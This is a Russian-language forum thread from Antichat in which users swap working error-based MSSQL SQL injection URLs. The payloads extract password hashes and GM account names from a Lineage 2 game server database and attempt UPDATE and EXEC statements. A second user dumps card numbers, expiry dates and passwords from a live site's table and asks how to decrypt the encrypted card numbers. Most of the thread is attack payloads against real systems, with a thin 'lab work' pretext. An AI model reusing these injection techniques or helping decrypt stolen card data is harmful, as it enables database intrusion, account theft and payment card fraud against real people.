ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Ну подскажи плиз, не могу update я сделать...
для примера:
такой запрос и ему подобные проходят
/?part=items&id=-35332+OR+1=(select+top+1+cast(password+as+varchar) %2Bchar(97)+from+lin2db..user_auth+where+account=% 22login%22)--
не могу прикрутить к нему второй ((select+top+2+cast(password+as+varchar)%2Bchar(97 )+from+lin2db..user_auth)+where+account=%22login%2 2)-- для перебора ...чтобы и перебор был и условие сохранялось?
Где я ошибаюсь в запросе UPDATE ?
/?part=items&id=-35332+OR+1=(update+lin2world..user_data+set+hp=%22 202.001%22+where+char_name=%22lalala%22)--......????
Знаки ; , ' вырезаются
И еще вопрос, чем можно php функцию intval заменить на C++ ? Весь ИНЕТ перерыл кажется. Не нашел ничего. Я так понял, что в ПХП она округляет значение до целочисленного, а в С++ если пользоваться целочисленным типом int, то он просто откидывает дробную часть %)...т.е. 1.6 = 1

Возможна ли sql-inj на сервере, где не используется переменная id(в url нет обращения к базе через переменную)? Если да, то как обнаружить возможность injection?

чувак скажи конкретно что ты хочешь вытащить из базы?!
или ты просто от нефиг делать его этот сайт пытаешь?

Я хочу повысить уровень своих знаний !!! Это моя лабораторная работа Во как сказал...
Дошел до вытаскивания ХЭШей ГМ-ов и т.д....набросал для себя програмку, которая эти ХЭШИ подбирает...
Не могу осилить, как сделать так, чтобы выбирать не первое, а второе, третье ... значение + УСЛОВИЕ.
Например: /?part=items&id=-35332+OR+1=(select+top+1+cast(account_name+as+varc har)%2Bchar(97)+from+lin2world..user_data+where+bu ilder=1)--
В этом запросе вывожу первый аккаунт где builder=1...рыдаю не могу вывести второй,третий... при том же условии builder=1.
Еще не могу понять, как можно здесь сделать UPDATE и EXEC....чего только не пробовал....где-то недопонимаю...вот и прошу помощи примерами, чтоб мозаика сложилась
И еще, так-как не силен в функциях MSSQL, то спрашиваю, есть ли функция наподобие cast(значение+as+varchar), только чтоб возвращала значения не в ASCII или там varchar, а в 16-ричном виде(ХЕКСе)...ну например для тех же ХЭШЕЙ???

попробуй так:

/?part=items&id=-35332+OR+1=(select+top+1+cast(account_name+as+varc har)%2Bchar(97)+from+lin2world..user_data+where+ca st(account_name+as+varc har)%2Bchar(97)+not+in+(select+top+2+cast(account_ name+as+varc har)%2Bchar(97)+from+lin2world..user_data))--

единственная проблема во втором select+top+2 более 2К занчений лучше не вводить.

задам тут свой вопрос.

таблица NAMES содержит поля:
---
EXP_MO
EXP_YR
CARD_NUM
---

EXP_MO и EXP_YR успешно выводятся запросом:
1%20or%201=(select+TOP+1+cast(EXP_MO+as+nvarchar)% 2Bchar(97)+FROM+NAMES)--

а вот CARD_NUM при таком же запросе просто перезагружает страницу без ошибки.
почему? могут быть в таблицах защищённые поля, которые не выводятся?

с полями NM_USERID и NM_PASSWORD такая же фигня происходит. хотя другие поля с именами, адресами и прочим выводятся без проблем.

У полей разный тип и хотя ты делаешь cast, они вместе могут не выводиться. А отдельно выводится номер карты?

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

нет, не выводится. даже

1%20or%201=(select+TOP+1+cast(len(CARD_NUM)+as+nva rchar)% 2Bchar(97)+FROM+NAMES)--

не выводится. и длинна паролей так же не выводится. хотя длинна других полей таким образом выводится.

Разобрался. Просто не все CARD_NUM заполнены. Надо выбирать только NOT NULL.

А карты оказались зашифрованы. Выглядят вот так: KmSrs8ltGQ8WyhlV71dY6$Wl0aaAD

реально отсюда как-то получить строку из 16 цифр?